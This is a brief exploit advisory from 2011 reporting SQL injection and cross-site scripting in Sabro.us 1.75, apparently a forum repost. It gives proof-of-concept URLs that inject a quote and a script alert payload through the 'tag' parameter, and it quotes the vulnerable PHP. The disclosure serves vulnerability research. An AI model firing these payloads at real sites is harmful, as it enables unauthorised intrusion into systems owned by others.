xss/sql injection in sabro.us 1.75
Kod:
# exploit title: xss/sql injection in sabro.us 1.75
# date: 14.o3.2o11
# author: lemlajt
# software : Sabro.us
# version: 1.75
# tested on: linux
# cve :
#
PoC :
1. sqli:
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag='
2. xss
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag="><script>alert(1)</script>
Details:
(...)
<title>sabros.us/<?=$Sabrosus->siteName?><? if((isset($_GET["tag"])) && (!empty($_GET["tag"]))){ $tag=$_GET["tag"];
echo" - ".htmlspecialchars($tag); } ?></title>
(...)
# regards,
# lemlajt
# *